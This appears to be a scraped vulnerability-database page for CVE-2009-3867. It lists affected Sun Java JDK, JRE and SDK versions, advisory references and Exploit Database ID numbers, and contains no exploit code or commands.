Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0 (Open CPE detail)

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0 (Open CPE detail)

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0 (Open CPE detail)

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0 (Open CPE detail)

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0 (Open CPE detail)

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0 (Open CPE detail)

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0 (Open CPE detail)

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0 (Open CPE detail)

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0 (Open CPE detail)

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0 (Open CPE detail)

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0 (Open CPE detail)

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_01

Sun>>Jre >> Version 1.4.2_01 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_1

Sun>>Jre >> Version 1.4.2_1 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_2

Sun>>Jre >> Version 1.4.2_2 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_02

Sun>>Jre >> Version 1.4.2_02 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_03

Sun>>Jre >> Version 1.4.2_03 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_3

Sun>>Jre >> Version 1.4.2_3 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_4

Sun>>Jre >> Version 1.4.2_4 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_04

Sun>>Jre >> Version 1.4.2_04 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_05

Sun>>Jre >> Version 1.4.2_05 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_5

Sun>>Jre >> Version 1.4.2_5 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_06

Sun>>Jre >> Version 1.4.2_06 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_6

Sun>>Jre >> Version 1.4.2_6 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_7

Sun>>Jre >> Version 1.4.2_7 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_07

Sun>>Jre >> Version 1.4.2_07 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_8

Sun>>Jre >> Version 1.4.2_8 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_08

Sun>>Jre >> Version 1.4.2_08 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_09

Sun>>Jre >> Version 1.4.2_09 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_9

Sun>>Jre >> Version 1.4.2_9 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_10

Sun>>Jre >> Version 1.4.2_10 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_11

Sun>>Jre >> Version 1.4.2_11 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_12

Sun>>Jre >> Version 1.4.2_12 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_13

Sun>>Jre >> Version 1.4.2_13 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_14

Sun>>Jre >> Version 1.4.2_14 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_15

Sun>>Jre >> Version 1.4.2_15 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_16

Sun>>Jre >> Version 1.4.2_16 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_17

Sun>>Jre >> Version 1.4.2_17 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_18

Sun>>Jre >> Version 1.4.2_18 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_19

Sun>>Jre >> Version 1.4.2_19 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_20

Sun>>Jre >> Version 1.4.2_20 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_21

Sun>>Jre >> Version 1.4.2_21 (Open CPE detail)

Sun>>Jre >> Version 1.4.2_22

Sun>>Jre >> Version 1.4.2_22 (Open CPE detail)

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0 (Open CPE detail)

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0 (Open CPE detail)

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0 (Open CPE detail)

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0 (Open CPE detail)

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0 (Open CPE detail)

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0 (Open CPE detail)

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0 (Open CPE detail)

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0 (Open CPE detail)

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0 (Open CPE detail)

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0 (Open CPE detail)

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0 (Open CPE detail)

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0 (Open CPE detail)

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0 (Open CPE detail)

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0 (Open CPE detail)

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_1

Sun>>Sdk >> Version 1.4.2_1 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_2

Sun>>Sdk >> Version 1.4.2_2 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_02

Sun>>Sdk >> Version 1.4.2_02 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_03

Sun>>Sdk >> Version 1.4.2_03 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_3

Sun>>Sdk >> Version 1.4.2_3 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_04

Sun>>Sdk >> Version 1.4.2_04 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_4

Sun>>Sdk >> Version 1.4.2_4 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_5

Sun>>Sdk >> Version 1.4.2_5 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_05

Sun>>Sdk >> Version 1.4.2_05 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_6

Sun>>Sdk >> Version 1.4.2_6 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_06

Sun>>Sdk >> Version 1.4.2_06 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_07

Sun>>Sdk >> Version 1.4.2_07 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_7

Sun>>Sdk >> Version 1.4.2_7 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_8

Sun>>Sdk >> Version 1.4.2_8 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_08

Sun>>Sdk >> Version 1.4.2_08 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_09

Sun>>Sdk >> Version 1.4.2_09 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_9

Sun>>Sdk >> Version 1.4.2_9 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_10

Sun>>Sdk >> Version 1.4.2_10 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_11

Sun>>Sdk >> Version 1.4.2_11 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_12

Sun>>Sdk >> Version 1.4.2_12 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_13

Sun>>Sdk >> Version 1.4.2_13 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_14

Sun>>Sdk >> Version 1.4.2_14 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_15

Sun>>Sdk >> Version 1.4.2_15 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_16

Sun>>Sdk >> Version 1.4.2_16 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_17

Sun>>Sdk >> Version 1.4.2_17 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_18

Sun>>Sdk >> Version 1.4.2_18 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_19

Sun>>Sdk >> Version 1.4.2_19 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_20

Sun>>Sdk >> Version 1.4.2_20 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_21

Sun>>Sdk >> Version 1.4.2_21 (Open CPE detail)

Sun>>Sdk >> Version 1.4.2_22

Sun>>Sdk >> Version 1.4.2_22 (Open CPE detail)

References

http://zerodayinitiative.com/advisories/ZDI-09-076/
Tags : x_refsource_MISC

http://marc.info/?l=bugtraq&m=126566824131534&w=2
Tags : vendor-advisory, x_refsource_HP

http://www.securityfocus.com/bid/36881
Tags : vdb-entry, x_refsource_BID

https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A6746
Tags : vdb-entry, signature, x_refsource_OVAL

http://support.apple.com/kb/HT3970
Tags : x_refsource_CONFIRM

http://marc.info/?l=bugtraq&m=134254866602253&w=2
Tags : vendor-advisory, x_refsource_HP

http://support.apple.com/kb/HT3969
Tags : x_refsource_CONFIRM

http://marc.info/?l=bugtraq&m=131593453929393&w=2
Tags : vendor-advisory, x_refsource_HP

http://security.gentoo.org/glsa/glsa-200911-02.xml
Tags : vendor-advisory, x_refsource_GENTOO

http://www.redhat.com/support/errata/RHSA-2009-1694.html
Tags : vendor-advisory, x_refsource_REDHAT

http://lists.apple.com/archives/security-announce/2009/Dec/msg00000.html
Tags : vendor-advisory, x_refsource_APPLE

http://secunia.com/advisories/37231
Tags : third-party-advisory, x_refsource_SECUNIA

http://marc.info/?l=bugtraq&m=126566824131534&w=2
Tags : vendor-advisory, x_refsource_HP

http://securitytracker.com/id?1023132
Tags : vdb-entry, x_refsource_SECTRACK

http://marc.info/?l=bugtraq&m=131593453929393&w=2
Tags : vendor-advisory, x_refsource_HP

http://lists.opensuse.org/opensuse-security-announce/2009-11/msg00010.html
Tags : vendor-advisory, x_refsource_SUSE

http://sunsolve.sun.com/search/document.do?assetkey=1-66-270474-1
Tags : vendor-advisory, x_refsource_SUNALERT

http://www.vupen.com/english/advisories/2009/3131
Tags : vdb-entry, x_refsource_VUPEN

http://lists.apple.com/archives/security-announce/2009/Dec/msg00001.html
Tags : vendor-advisory, x_refsource_APPLE

http://secunia.com/advisories/37581
Tags : third-party-advisory, x_refsource_SECUNIA

https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11903
Tags : vdb-entry, signature, x_refsource_OVAL

http://www.oracle.com/technetwork/topics/security/cpujan2010-084891.html
Tags : x_refsource_CONFIRM

http://java.sun.com/javase/6/webnotes/6u17.html
Tags : x_refsource_CONFIRM

http://secunia.com/advisories/37841
Tags : third-party-advisory, x_refsource_SECUNIA

http://secunia.com/advisories/37239
Tags : third-party-advisory, x_refsource_SECUNIA

https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A7750
Tags : vdb-entry, signature, x_refsource_OVAL

http://secunia.com/advisories/37386
Tags : third-party-advisory, x_refsource_SECUNIA

CVE-2009-3867 : Detail

CVE-2009-3867

CVE Descriptions

CVE Informations

Related Weaknesses

Metrics

EPSS

EPSS Score

EPSS Percentile

Exploit information

Exploit Database EDB-ID : 33315

Exploit Database EDB-ID : 16294

Exploit Database EDB-ID : 33316

Products Mentioned

Configuraton 0

Configuraton 0

Configuraton 0

Configuraton 0

References